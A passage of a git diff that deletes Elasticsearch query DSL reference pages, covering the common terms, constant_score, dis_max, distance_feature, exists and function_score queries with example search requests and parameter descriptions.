configuration, provided that the total number of hits is not tracked."] - -The `common` terms query is a modern alternative to stopwords which -improves the precision and recall of search results (by taking stopwords -into account), without sacrificing performance. - -[discrete] -==== The problem - -Every term in a query has a cost. A search for `"The brown fox"` -requires three term queries, one for each of `"the"`, `"brown"` and -`"fox"`, all of which are executed against all documents in the index. -The query for `"the"` is likely to match many documents and thus has a -much smaller impact on relevance than the other two terms. - -Previously, the solution to this problem was to ignore terms with high -frequency. By treating `"the"` as a _stopword_, we reduce the index size -and reduce the number of term queries that need to be executed. - -The problem with this approach is that, while stopwords have a small -impact on relevance, they are still important. If we remove stopwords, -we lose precision, (eg we are unable to distinguish between `"happy"` -and `"not happy"`) and we lose recall (eg text like `"The The"` or -`"To be or not to be"` would simply not exist in the index). - -[discrete] -==== The solution - -The `common` terms query divides the query terms into two groups: more -important (ie _low frequency_ terms) and less important (ie _high -frequency_ terms which would previously have been stopwords). - -First it searches for documents which match the more important terms. -These are the terms which appear in fewer documents and have a greater -impact on relevance. - -Then, it executes a second query for the less important terms -- terms -which appear frequently and have a low impact on relevance. But instead -of calculating the relevance score for *all* matching documents, it only -calculates the `_score` for documents already matched by the first -query. In this way the high frequency terms can improve the relevance -calculation without paying the cost of poor performance. - -If a query consists only of high frequency terms, then a single query is -executed as an `AND` (conjunction) query, in other words all terms are -required. Even though each individual term will match many documents, -the combination of terms narrows down the resultset to only the most -relevant. The single query can also be executed as an `OR` with a -specific -<>, -in this case a high enough value should probably be used. - -Terms are allocated to the high or low frequency groups based on the -`cutoff_frequency`, which can be specified as an absolute frequency -(`>=1`) or as a relative frequency (`0.0 .. 1.0`). (Remember that document -frequencies are computed on a per shard level as explained in the blog post -{defguide}/relevance-is-broken.html[Relevance is broken].) - -Perhaps the most interesting property of this query is that it adapts to -domain specific stopwords automatically. For example, on a video hosting -site, common terms like `"clip"` or `"video"` will automatically behave -as stopwords without the need to maintain a manual list. - -[discrete] -==== Examples - -In this example, words that have a document frequency greater than 0.1% -(eg `"this"` and `"is"`) will be treated as _common terms_. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "common": { - "body": { - "query": "this is bonsai cool", - "cutoff_frequency": 0.001 - } - } - } -} --------------------------------------------------- -// TEST[warning:Deprecated field [common] used, replaced by [[match] query which can efficiently skip blocks of documents if the total number of hits is not tracked]] - -The number of terms which should match can be controlled with the -<> -(`high_freq`, `low_freq`), `low_freq_operator` (default `"or"`) and -`high_freq_operator` (default `"or"`) parameters. - -For low frequency terms, set the `low_freq_operator` to `"and"` to make -all terms required: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "common": { - "body": { - "query": "nelly the elephant as a cartoon", - "cutoff_frequency": 0.001, - "low_freq_operator": "and" - } - } - } -} --------------------------------------------------- -// TEST[warning:Deprecated field [common] used, replaced by [[match] query which can efficiently skip blocks of documents if the total number of hits is not tracked]] - -which is roughly equivalent to: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "bool": { - "must": [ - { "term": { "body": "nelly"}}, - { "term": { "body": "elephant"}}, - { "term": { "body": "cartoon"}} - ], - "should": [ - { "term": { "body": "the"}}, - { "term": { "body": "as"}}, - { "term": { "body": "a"}} - ] - } - } -} --------------------------------------------------- - -Alternatively use -<> -to specify a minimum number or percentage of low frequency terms which -must be present, for instance: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "common": { - "body": { - "query": "nelly the elephant as a cartoon", - "cutoff_frequency": 0.001, - "minimum_should_match": 2 - } - } - } -} --------------------------------------------------- -// TEST[warning:Deprecated field [common] used, replaced by [[match] query which can efficiently skip blocks of documents if the total number of hits is not tracked]] - -which is roughly equivalent to: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "bool": { - "must": { - "bool": { - "should": [ - { "term": { "body": "nelly"}}, - { "term": { "body": "elephant"}}, - { "term": { "body": "cartoon"}} - ], - "minimum_should_match": 2 - } - }, - "should": [ - { "term": { "body": "the"}}, - { "term": { "body": "as"}}, - { "term": { "body": "a"}} - ] - } - } -} --------------------------------------------------- - -A different -<> -can be applied for low and high frequency terms with the additional -`low_freq` and `high_freq` parameters. Here is an example when providing -additional parameters (note the change in structure): - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "common": { - "body": { - "query": "nelly the elephant not as a cartoon", - "cutoff_frequency": 0.001, - "minimum_should_match": { - "low_freq": 2, - "high_freq": 3 - } - } - } - } -} --------------------------------------------------- -// TEST[warning:Deprecated field [common] used, replaced by [[match] query which can efficiently skip blocks of documents if the total number of hits is not tracked]] - -which is roughly equivalent to: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "bool": { - "must": { - "bool": { - "should": [ - { "term": { "body": "nelly"}}, - { "term": { "body": "elephant"}}, - { "term": { "body": "cartoon"}} - ], - "minimum_should_match": 2 - } - }, - "should": { - "bool": { - "should": [ - { "term": { "body": "the"}}, - { "term": { "body": "not"}}, - { "term": { "body": "as"}}, - { "term": { "body": "a"}} - ], - "minimum_should_match": 3 - } - } - } - } -} --------------------------------------------------- - -In this case it means the high frequency terms have only an impact on -relevance when there are at least three of them. But the most -interesting use of the -<> -for high frequency terms is when there are only high frequency terms: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "common": { - "body": { - "query": "how not to be", - "cutoff_frequency": 0.001, - "minimum_should_match": { - "low_freq": 2, - "high_freq": 3 - } - } - } - } -} --------------------------------------------------- -// TEST[warning:Deprecated field [common] used, replaced by [[match] query which can efficiently skip blocks of documents if the total number of hits is not tracked]] - -which is roughly equivalent to: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "bool": { - "should": [ - { "term": { "body": "how"}}, - { "term": { "body": "not"}}, - { "term": { "body": "to"}}, - { "term": { "body": "be"}} - ], - "minimum_should_match": "3<50%" - } - } -} --------------------------------------------------- - -The high frequency generated query is then slightly less restrictive -than with an `AND`. - -The `common` terms query also supports `boost` and `analyzer` as -parameters. diff --git a/docs/reference/query-dsl/compound-queries.asciidoc b/docs/reference/query-dsl/compound-queries.asciidoc deleted file mode 100644 index d156950e355..00000000000 --- a/docs/reference/query-dsl/compound-queries.asciidoc +++ /dev/null @@ -1,40 +0,0 @@ -[[compound-queries]] -== Compound queries - -Compound queries wrap other compound or leaf queries, either to combine their -results and scores, to change their behaviour, or to switch from query to -filter context. - -The queries in this group are: - -<>:: -The default query for combining multiple leaf or compound query clauses, as -`must`, `should`, `must_not`, or `filter` clauses. The `must` and `should` -clauses have their scores combined -- the more matching clauses, the better -- -while the `must_not` and `filter` clauses are executed in filter context. - -<>:: -Return documents which match a `positive` query, but reduce the score of -documents which also match a `negative` query. - -<>:: -A query which wraps another query, but executes it in filter context. All -matching documents are given the same ``constant'' `_score`. - -<>:: -A query which accepts multiple queries, and returns any documents which match -any of the query clauses. While the `bool` query combines the scores from all -matching queries, the `dis_max` query uses the score of the single best- -matching query clause. - -<>:: -Modify the scores returned by the main query with functions to take into -account factors like popularity, recency, distance, or custom algorithms -implemented with scripting. - - -include::bool-query.asciidoc[] -include::boosting-query.asciidoc[] -include::constant-score-query.asciidoc[] -include::dis-max-query.asciidoc[] -include::function-score-query.asciidoc[] \ No newline at end of file diff --git a/docs/reference/query-dsl/constant-score-query.asciidoc b/docs/reference/query-dsl/constant-score-query.asciidoc deleted file mode 100644 index f2e8d7a16b4..00000000000 --- a/docs/reference/query-dsl/constant-score-query.asciidoc +++ /dev/null @@ -1,41 +0,0 @@ -[[query-dsl-constant-score-query]] -=== Constant score query -++++ -Constant score -++++ - -Wraps a <> and returns every matching -document with a <> equal to the `boost` -parameter value. - -[source,console] ----- -GET /_search -{ - "query": { - "constant_score": { - "filter": { - "term": { "user.id": "kimchy" } - }, - "boost": 1.2 - } - } -} ----- - -[[constant-score-top-level-params]] -==== Top-level parameters for `constant_score` -`filter`:: -+ --- -(Required, query object) <> you wish to run. -Any returned documents must match this query. - -Filter queries do not calculate <>. To -speed up performance, {es} automatically caches frequently used filter queries. --- - -`boost`:: -(Optional, float) Floating point number used as the constant -<> for every document matching the -`filter` query. Defaults to `1.0`. \ No newline at end of file diff --git a/docs/reference/query-dsl/dis-max-query.asciidoc b/docs/reference/query-dsl/dis-max-query.asciidoc deleted file mode 100644 index 80bc34236a9..00000000000 --- a/docs/reference/query-dsl/dis-max-query.asciidoc +++ /dev/null @@ -1,66 +0,0 @@ -[[query-dsl-dis-max-query]] -=== Disjunction max query -++++ -Disjunction max -++++ - -Returns documents matching one or more wrapped queries, called query clauses or -clauses. - -If a returned document matches multiple query clauses, the `dis_max` query -assigns the document the highest relevance score from any matching clause, plus -a tie breaking increment for any additional matching subqueries. - -You can use the `dis_max` to search for a term in fields mapped with different -<> factors. - -[[query-dsl-dis-max-query-ex-request]] -==== Example request - -[source,console] ----- -GET /_search -{ - "query": { - "dis_max": { - "queries": [ - { "term": { "title": "Quick pets" } }, - { "term": { "body": "Quick pets" } } - ], - "tie_breaker": 0.7 - } - } -} ----- - -[[query-dsl-dis-max-query-top-level-params]] -==== Top-level parameters for `dis_max` - -`queries`:: -(Required, array of query objects) Contains one or more query clauses. Returned -documents **must match one or more** of these queries. If a document matches -multiple queries, {es} uses the highest <>. - -`tie_breaker`:: -+ --- -(Optional, float) Floating point number between `0` and `1.0` used to increase -the <> of documents matching multiple -query clauses. Defaults to `0.0`. - -You can use the `tie_breaker` value to assign higher relevance scores to -documents that contain the same term in multiple fields than documents that -contain this term in only the best of those multiple fields, without confusing -this with the better case of two different terms in the multiple fields. - -If a document matches multiple clauses, the `dis_max` query calculates the -relevance score for the document as follows: - -. Take the relevance score from a matching clause with the highest score. -. Multiply the score from any other matching clauses by the `tie_breaker` value. -. Add the highest score to the multiplied scores. - -If the `tie_breaker` value is greater than `0.0`, all matching clauses count, -but the clause with the highest score counts most. --- \ No newline at end of file diff --git a/docs/reference/query-dsl/distance-feature-query.asciidoc b/docs/reference/query-dsl/distance-feature-query.asciidoc deleted file mode 100644 index 05ce0873f58..00000000000 --- a/docs/reference/query-dsl/distance-feature-query.asciidoc +++ /dev/null @@ -1,225 +0,0 @@ -[[query-dsl-distance-feature-query]] -=== Distance feature query -++++ -Distance feature -++++ - -Boosts the <> of documents closer to a -provided `origin` date or point. For example, you can use this query to give -more weight to documents closer to a certain date or location. - -You can use the `distance_feature` query to find the nearest neighbors to a -location. You can also use the query in a <> -search's `should` filter to add boosted relevance scores to the `bool` query's -scores. - - -[[distance-feature-query-ex-request]] -==== Example request - -[[distance-feature-index-setup]] -===== Index setup -To use the `distance_feature` query, your index must include a <>, -<> or <> field. - -To see how you can set up an index for the `distance_feature` query, try the -following example. - -. Create an `items` index with the following field mapping: -+ --- - -* `name`, a <> field -* `production_date`, a <> field -* `location`, a <> field - -[source,console] ----- -PUT /items -{ - "mappings": { - "properties": { - "name": { - "type": "keyword" - }, - "production_date": { - "type": "date" - }, - "location": { - "type": "geo_point" - } - } - } -} ----- -// TESTSETUP --- - -. Index several documents to this index. -+ --- -[source,console] ----- -PUT /items/_doc/1?refresh -{ - "name" : "chocolate", - "production_date": "2018-02-01", - "location": [-71.34, 41.12] -} - -PUT /items/_doc/2?refresh -{ - "name" : "chocolate", - "production_date": "2018-01-01", - "location": [-71.3, 41.15] -} - - -PUT /items/_doc/3?refresh -{ - "name" : "chocolate", - "production_date": "2017-12-01", - "location": [-71.3, 41.12] -} ----- --- - - -[[distance-feature-query-ex-query]] -===== Example queries - -[[distance-feature-query-date-ex]] -====== Boost documents based on date -The following `bool` search returns documents with a `name` value of -`chocolate`. The search also uses the `distance_feature` query to increase the -relevance score of documents with a `production_date` value closer to `now`. - -[source,console] ----- -GET /items/_search -{ - "query": { - "bool": { - "must": { - "match": { - "name": "chocolate" - } - }, - "should": { - "distance_feature": { - "field": "production_date", - "pivot": "7d", - "origin": "now" - } - } - } - } -} ----- - -[[distance-feature-query-distance-ex]] -====== Boost documents based on location -The following `bool` search returns documents with a `name` value of -`chocolate`. The search also uses the `distance_feature` query to increase the -relevance score of documents with a `location` value closer to `[-71.3, 41.15]`. - -[source,console] ----- -GET /items/_search -{ - "query": { - "bool": { - "must": { - "match": { - "name": "chocolate" - } - }, - "should": { - "distance_feature": { - "field": "location", - "pivot": "1000m", - "origin": [-71.3, 41.15] - } - } - } - } -} ----- - - -[[distance-feature-top-level-params]] -==== Top-level parameters for `distance_feature` -`field`:: -(Required, string) Name of the field used to calculate distances. This field -must meet the following criteria: - -* Be a <>, <> or -<> field -* Have an <> mapping parameter value of `true`, which is -the default -* Have an <> mapping parameter value of `true`, which -is the default - -`origin`:: -+ --- -(Required, string) Date or point of origin used to calculate distances. - -If the `field` value is a <> or <> -field, the `origin` value must be a <>. -<>, such as `now-1h`, is supported. - -If the `field` value is a <> field, the `origin` value -must be a geopoint. --- - -`pivot`:: -+ --- -(Required, <> or <>) -Distance from the `origin` at which relevance scores receive half of the `boost` -value. - -If the `field` value is a <> or <> -field, the `pivot` value must be a <>, such as `1h` or -`10d`. - -If the `field` value is a <> field, the `pivot` value -must be a <>, such as `1km` or `12m`. --- - -`boost`:: -+ --- -(Optional, float) Floating point number used to multiply the -<> of matching documents. This value -cannot be negative. Defaults to `1.0`. --- - - -[[distance-feature-notes]] -==== Notes - -[[distance-feature-calculation]] -===== How the `distance_feature` query calculates relevance scores -The `distance_feature` query dynamically calculates the distance between the -`origin` value and a document's field values. It then uses this distance as a -feature to boost the <> of closer -documents. - -The `distance_feature` query calculates a document's -<> as follows: - -``` -relevance score = boost * pivot / (pivot + distance) -``` - -The `distance` is the absolute difference between the `origin` value and a -document's field value. - -[[distance-feature-skip-hits]] -===== Skip non-competitive hits -Unlike the <> query or other -ways to change <>, the -`distance_feature` query efficiently skips non-competitive hits when the -<> parameter is **not** `true`. \ No newline at end of file diff --git a/docs/reference/query-dsl/exists-query.asciidoc b/docs/reference/query-dsl/exists-query.asciidoc deleted file mode 100644 index 75d1b07ea38..00000000000 --- a/docs/reference/query-dsl/exists-query.asciidoc +++ /dev/null @@ -1,69 +0,0 @@ -[[query-dsl-exists-query]] -=== Exists query -++++ -Exists -++++ - -Returns documents that contain an indexed value for a field. - -An indexed value may not exist for a document's field due to a variety of reasons: - -* The field in the source JSON is `null` or `[]` -* The field has `"index" : false` set in the mapping -* The length of the field value exceeded an `ignore_above` setting in the mapping -* The field value was malformed and `ignore_malformed` was defined in the mapping - -[[exists-query-ex-request]] -==== Example request - -[source,console] ----- -GET /_search -{ - "query": { - "exists": { - "field": "user" - } - } -} ----- - -[[exists-query-top-level-params]] -==== Top-level parameters for `exists` -`field`:: -(Required, string) Name of the field you wish to search. -+ -While a field is deemed non-existent if the JSON value is `null` or `[]`, these -values will indicate the field does exist: -+ -* Empty strings, such as `""` or `"-"` -* Arrays containing `null` and another value, such as `[null, "foo"]` -* A custom <>, defined in field mapping - -[[exists-query-notes]] -==== Notes - -[[find-docs-null-values]] -===== Find documents missing indexed values -To find documents that are missing an indexed value for a field, -use the `must_not` <> with the `exists` -query. - -The following search returns documents that are missing an indexed value for -the `user.id` field. - -[source,console] ----- -GET /_search -{ - "query": { - "bool": { - "must_not": { - "exists": { - "field": "user.id" - } - } - } - } -} ----- diff --git a/docs/reference/query-dsl/full-text-queries.asciidoc b/docs/reference/query-dsl/full-text-queries.asciidoc deleted file mode 100644 index dda1c1546d0..00000000000 --- a/docs/reference/query-dsl/full-text-queries.asciidoc +++ /dev/null @@ -1,61 +0,0 @@ -[[full-text-queries]] -== Full text queries - -The full text queries enable you to search <> such as the -body of an email. The query string is processed using the same analyzer that was applied to -the field during indexing. - -The queries in this group are: - -<>:: -A full text query that allows fine-grained control of the ordering and -proximity of matching terms. - -<>:: -The standard query for performing full text queries, including fuzzy matching -and phrase or proximity queries. - -<>:: -Creates a `bool` query that matches each term as a `term` query, except for -the last term, which is matched as a `prefix` query - -<>:: -Like the `match` query but used for matching exact phrases or word proximity matches. - -<>:: -Like the `match_phrase` query, but does a wildcard search on the final word. - -<>:: -The multi-field version of the `match` query. - -<>:: - - A more specialized query which gives more preference to uncommon words. - -<>:: -Supports the compact Lucene <>, -allowing you to specify AND|OR|NOT conditions and multi-field search -within a single query string. For expert users only. - -<>:: -A simpler, more robust version of the `query_string` syntax suitable -for exposing directly to users. - - -include::intervals-query.asciidoc[] - -include::match-query.asciidoc[] - -include::match-bool-prefix-query.asciidoc[] - -include::match-phrase-query.asciidoc[] - -include::match-phrase-prefix-query.asciidoc[] - -include::multi-match-query.asciidoc[] - -include::common-terms-query.asciidoc[] - -include::query-string-query.asciidoc[] - -include::simple-query-string-query.asciidoc[] \ No newline at end of file diff --git a/docs/reference/query-dsl/function-score-query.asciidoc b/docs/reference/query-dsl/function-score-query.asciidoc deleted file mode 100644 index 9e742c90a55..00000000000 --- a/docs/reference/query-dsl/function-score-query.asciidoc +++ /dev/null @@ -1,664 +0,0 @@ -[[query-dsl-function-score-query]] -=== Function score query -++++ -Function score -++++ - -The `function_score` allows you to modify the score of documents that are -retrieved by a query. This can be useful if, for example, a score -function is computationally expensive and it is sufficient to compute -the score on a filtered set of documents. - -To use `function_score`, the user has to define a query and one or -more functions, that compute a new score for each document returned -by the query. - -`function_score` can be used with only one function like this: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "function_score": { - "query": { "match_all": {} }, - "boost": "5", - "random_score": {}, <1> - "boost_mode": "multiply" - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -<1> See <> for a list of supported functions. - -Furthermore, several functions can be combined. In this case one can -optionally choose to apply the function only if a document matches a -given filtering query - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "function_score": { - "query": { "match_all": {} }, - "boost": "5", <1> - "functions": [ - { - "filter": { "match": { "test": "bar" } }, - "random_score": {}, <2> - "weight": 23 - }, - { - "filter": { "match": { "test": "cat" } }, - "weight": 42 - } - ], - "max_boost": 42, - "score_mode": "max", - "boost_mode": "multiply", - "min_score": 42 - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -<1> Boost for the whole query. -<2> See <> for a list of supported functions. - -NOTE: The scores produced by the filtering query of each function do not matter. - -If no filter is given with a function this is equivalent to specifying -`"match_all": {}` - -First, each document is scored by the defined functions. The parameter -`score_mode` specifies how the computed scores are combined: - -[horizontal] -`multiply`:: scores are multiplied (default) -`sum`:: scores are summed -`avg`:: scores are averaged -`first`:: the first function that has a matching filter - is applied -`max`:: maximum score is used -`min`:: minimum score is used - -Because scores can be on different scales (for example, between 0 and 1 for decay functions but arbitrary for `field_value_factor`) and also -because sometimes a different impact of functions on the score is desirable, the score of each function can be adjusted with a user defined -`weight`. The `weight` can be defined per function in the `functions` array (example above) and is multiplied with the score computed by -the respective function. -If weight is given without any other function declaration, `weight` acts as a function that simply returns the `weight`. - -In case `score_mode` is set to `avg` the individual scores will be combined by a **weighted** average. -For example, if two functions return score 1 and 2 and their respective weights are 3 and 4, then their scores will be combined as -`(1*3+2*4)/(3+4)` and **not** `(1*3+2*4)/2`. - -The new score can be restricted to not exceed a certain limit by setting -the `max_boost` parameter. The default for `max_boost` is FLT_MAX. - -The newly computed score is combined with the score of the -query. The parameter `boost_mode` defines how: - -[horizontal] -`multiply`:: query score and function score is multiplied (default) -`replace`:: only function score is used, the query score is ignored -`sum`:: query score and function score are added -`avg`:: average -`max`:: max of query score and function score -`min`:: min of query score and function score - -By default, modifying the score does not change which documents match. To exclude -documents that do not meet a certain score threshold the `min_score` parameter can be set to the desired score threshold. - -NOTE: For `min_score` to work, **all** documents returned by the query need to be scored and then filtered out one by one. - -[[score-functions]] - -The `function_score` query provides several types of score functions. - -* <> -* <> -* <> -* <> -* <>: `gauss`, `linear`, `exp` - -[[function-script-score]] -==== Script score - -The `script_score` function allows you to wrap another query and customize -the scoring of it optionally with a computation derived from other numeric -field values in the doc using a script expression. Here is a -simple sample: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "function_score": { - "query": { - "match": { "message": "elasticsearch" } - }, - "script_score": { - "script": { - "source": "Math.log(2 + doc['my-int'].value)" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -[IMPORTANT] -==== -In {es}, all document scores are positive 32-bit floating point numbers. - -If the `script_score` function produces a score with greater precision, it is -converted to the nearest 32-bit float. - -Similarly, scores must be non-negative. Otherwise, {es} returns an error. -==== - -On top of the different scripting field values and expression, the -`_score` script parameter can be used to retrieve the score based on the -wrapped query. - -Scripts compilation is cached for faster execution. If the script has -parameters that it needs to take into account, it is preferable to reuse the -same script, and provide parameters to it: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "function_score": { - "query": { - "match": { "message": "elasticsearch" } - }, - "script_score": { - "script": { - "params": { - "a": 5, - "b": 1.2 - }, - "source": "params.a / Math.pow(params.b, doc['my-int'].value)" - } - } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -Note that unlike the `custom_score` query, the -score of the query is multiplied with the result of the script scoring. If -you wish to inhibit this, set `"boost_mode": "replace"` - -[[function-weight]] -==== Weight - -The `weight` score allows you to multiply the score by the provided -`weight`. This can sometimes be desired since boost value set on -specific queries gets normalized, while for this score function it does -not. The number value is of type float. - -[source,js] --------------------------------------------------- -"weight" : number --------------------------------------------------- -// NOTCONSOLE -// I couldn't come up with a good example for this one. - -[[function-random]] -==== Random - -The `random_score` generates scores that are uniformly distributed from 0 up to -but not including 1. By default, it uses the internal Lucene doc ids as a -source of randomness, which is very efficient but unfortunately not -reproducible since documents might be renumbered by merges. - -In case you want scores to be reproducible, it is possible to provide a `seed` -and `field`. The final score will then be computed based on this seed, the -minimum value of `field` for the considered document and a salt that is computed -based on the index name and shard id so that documents that have the same -value but are stored in different indexes get different scores. Note that -documents that are within the same shard and have the same value for `field` -will however get the same score, so it is usually desirable to use a field that -has unique values for all documents. A good default choice might be to use the -`_seq_no` field, whose only drawback is that scores will change if the document -is updated since update operations also update the value of the `_seq_no` field. - -NOTE: It was possible to set a seed without setting a field, but this has been -deprecated as this requires loading fielddata on the `_id` field which consumes -a lot of memory. - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "function_score": { - "random_score": { - "seed": 10, - "field": "_seq_no" - } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -[[function-field-value-factor]] -==== Field Value factor - -The `field_value_factor` function allows you to use a field from a document to -influence the score. It's similar to using the `script_score` function, however, -it avoids the overhead of scripting. If used on a multi-valued field, only the -first value of the field is used in calculations. - -As an example, imagine you have a document indexed with a numeric `my-int` -field and wish to influence the score of a document with this field, an example -doing so would look like: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "function_score": { - "field_value_factor": { - "field": "my-int", - "factor": 1.2, - "modifier": "sqrt", - "missing": 1 - } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -Which will translate into the following formula for scoring: - -`sqrt(1.2 * doc['my-int'].value)` - -There are a number of options for the `field_value_factor` function: - -[horizontal] -`field`:: - - Field to be extracted from the document. - -`factor`:: - - Optional factor to multiply the field value with, defaults to `1`. - -`modifier`:: - - Modifier to apply to the field value, can be one of: `none`, `log`, - `log1p`, `log2p`, `ln`, `ln1p`, `ln2p`, `square`, `sqrt`, or `reciprocal`. - Defaults to `none`. - -[cols="<,<",options="header",] -|======================================================================= -| Modifier | Meaning - -| `none` | Do not apply any multiplier to the field value -| `log` | Take the {wikipedia}/Common_logarithm[common logarithm] of the field value. - Because this function will return a negative value and cause an error if used on values - between 0 and 1, it is recommended to use `log1p` instead. -| `log1p` | Add 1 to the field value and take the common logarithm -| `log2p` | Add 2 to the field value and take the common logarithm -| `ln` | Take the {wikipedia}/Natural_logarithm[natural logarithm] of the field value. - Because this function will return a negative value and cause an error if used on values - between 0 and 1, it is recommended to use `ln1p` instead. -| `ln1p` | Add 1 to the field value and take the natural logarithm -| `ln2p` | Add 2 to the field value and take the natural logarithm -| `square` | Square the field value (multiply it by itself) -| `sqrt` | Take the {wikipedia}/Square_root[square root] of the field value -| `reciprocal` | {wikipedia}/Multiplicative_inverse[Reciprocate] the field value, same as `1/x` where `x` is the field's value -|======================================================================= - -`missing`:: - - Value used if the document doesn't have that field. The modifier - and factor are still applied to it as though it were read from the document. - -NOTE: Scores produced by the `field_value_score` function must be -non-negative, otherwise an error will be thrown. The `log` and `ln` modifiers -will produce negative values if used on values between 0 and 1. Be sure to limit -the values of the field with a range filter to avoid this, or use `log1p` and -`ln1p`. - -NOTE: Keep in mind that taking the log() of 0, or the square root of a -negative number is an illegal operation, and an exception will be thrown. Be -sure to limit the values of the field with a range filter to avoid this, or use -`log1p` and `ln1p`. - - -[[function-decay]] -==== Decay functions - -Decay functions score a document with a function that decays depending -on the distance of a numeric field value of the document from a user -given origin. This is similar to a range query, but with smooth edges -instead of boxes. - -To use distance scoring on a query that has numerical fields, the user -has to define an `origin` and a `scale` for each field. The `origin` -is needed to define the ``central point'' from which the distance -is calculated, and the `scale` to define the rate of decay. The -decay function is specified as - -[source,js] --------------------------------------------------- -"DECAY_FUNCTION": { <1> - "FIELD_NAME": { <2> - "origin": "11, 12", - "scale": "2km", - "offset": "0km", - "decay": 0.33 - } -} --------------------------------------------------- -// NOTCONSOLE -<1> The `DECAY_FUNCTION` should be one of `linear`, `exp`, or `gauss`. -<2> The specified field must be a numeric, date, or geo-point field. - -In the above example, the field is a <> and origin can -be provided in geo format. `scale` and `offset` must be given with a unit in -this case. If your field is a date field, you can set `scale` and `offset` as -days, weeks, and so on. Example: - - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "function_score": { - "gauss": { - "@timestamp": { - "origin": "2013-09-17", <1> - "scale": "10d", - "offset": "5d", <2> - "decay": 0.5 <2> - } - } - } - } -} --------------------------------------------------- -// TEST[setup:my_index] - -<1> The date format of the origin depends on the <> defined in - your mapping. If you do not define the origin, the current time is used. -<2> The `offset` and `decay` parameters are optional. - -[horizontal] -`origin`:: - The point of origin used for calculating distance. Must be given as a - number for numeric field, date for date fields and geo point for geo fields. - Required for geo and numeric field. For date fields the default is `now`. Date - math (for example `now-1h`) is supported for origin. - -`scale`:: - Required for all types. Defines the distance from origin + offset at which the computed - score will equal `decay` parameter. For geo fields: Can be defined as number+unit (1km, 12m,...). - Default unit is meters. For date fields: Can to be defined as a number+unit ("1h", "10d",...). - Default unit is milliseconds. For numeric field: Any number. - -`offset`:: - If an `offset` is defined, the decay function will only compute the - decay function for documents with a distance greater than the defined - `offset`. The default is 0. - -`decay`:: - The `decay` parameter defines how documents are scored at the distance - given at `scale`. If no `decay` is defined, documents at the distance - `scale` will be scored 0.5. - -In the first example, your documents might represents hotels and contain a geo -location field. You want to compute a decay function depending on how -far the hotel is from a given location. You might not immediately see -what scale to choose for the gauss function, but you can say something -like: "At a distance of 2km from the desired location, the score should -be reduced to one third." -The parameter "scale" will then be adjusted automatically to assure that -the score function computes a score of 0.33 for hotels that are 2km away -from the desired location. - - -In the second example, documents with a field value between 2013-09-12 and 2013-09-22 would get a weight of 1.0 and documents which are 15 days from that date a weight of 0.5. - -===== Supported decay functions - -The `DECAY_FUNCTION` determines the shape of the decay: - -`gauss`:: -+ --- -Normal decay, computed as: - -image:images/Gaussian.png[] - -where image:images/sigma.png[] is computed to assure that the score takes the value `decay` at distance `scale` from `origin`+-`offset` - -// \sigma^2 = -scale^2/(2 \cdot ln(decay)) -image:images/sigma_calc.png[] - -See <> for graphs demonstrating the curve generated by the `gauss` function. - --- - -`exp`:: -+ --- -Exponential decay, computed as: - -image:images/Exponential.png[] - -where again the parameter image:images/lambda.png[] is computed to assure that the score takes the value `decay` at distance `scale` from `origin`+-`offset` - -// \lambda = ln(decay)/scale -image:images/lambda_calc.png[] - -See <> for graphs demonstrating the curve generated by the `exp` function. - --- - -`linear`:: -+ --- -Linear decay, computed as: - -image:images/Linear.png[]. - - -where again the parameter `s` is computed to assure that the score takes the value `decay` at distance `scale` from `origin`+-`offset` - -image:images/s_calc.png[] - -In contrast to the normal and exponential decay, this function actually -sets the score to 0 if the field value exceeds twice the user given -scale value. --- - -For single functions the three decay functions together with their parameters can be visualized like this (the field in this example called "age"): - -image:images/decay_2d.png[width=600] - -===== Multi-values fields - -If a field used for computing the decay contains multiple values, per default the value closest to the origin is chosen for determining the distance. -This can be changed by setting `multi_value_mode`. - -[horizontal] -`min`:: Distance is the minimum distance -`max`:: Distance is the maximum distance -`avg`:: Distance is the average distance -`sum`:: Distance is the sum of all distances - -Example: - -[source,js] --------------------------------------------------- - "DECAY_FUNCTION": { - "FIELD_NAME": { - "origin": ..., - "scale": ... - }, - "multi_value_mode": "avg" - } --------------------------------------------------- -// NOTCONSOLE - - -==== Detailed example - -Suppose you are searching for a hotel in a certain town. Your budget is -limited. Also, you would like the hotel to be close to the town center, -so the farther the hotel is from the desired location the less likely -you are to check in. - -You would like the query results that match your criterion (for -example, "hotel, Nancy, non-smoker") to be scored with respect to -distance to the town center and also the price. - -Intuitively, you would like to define the town center as the origin and -maybe you are willing to walk 2km to the town center from the hotel. + -In this case your *origin* for the location field is the town center -and the *scale* is ~2km. - -If your budget is low, you would probably prefer something cheap above -something expensive. For the price field, the *origin* would be 0 Euros -and the *scale* depends on how much you are willing to pay, for example 20 Euros. - -In this example, the fields might be called "price" for the price of the -hotel and "location" for the coordinates of this hotel. - -The function for `price` in this case would be - -[source,js] --------------------------------------------------- -"gauss": { <1> - "price": { - "origin": "0", - "scale": "20" - } -} --------------------------------------------------- -// NOTCONSOLE -<1> This decay function could also be `linear` or `exp`. - -and for `location`: - -[source,js] --------------------------------------------------- - -"gauss": { <1> - "location": { - "origin": "11, 12", - "scale": "2km" - } -} --------------------------------------------------- -// NOTCONSOLE -<1> This decay function could also be `linear` or `exp`. - -Suppose you want to multiply these two functions on the original score, -the request would look like this: - -[source,console] --------------------------------------------------- -GET /_search -{ - "query": { - "function_score": 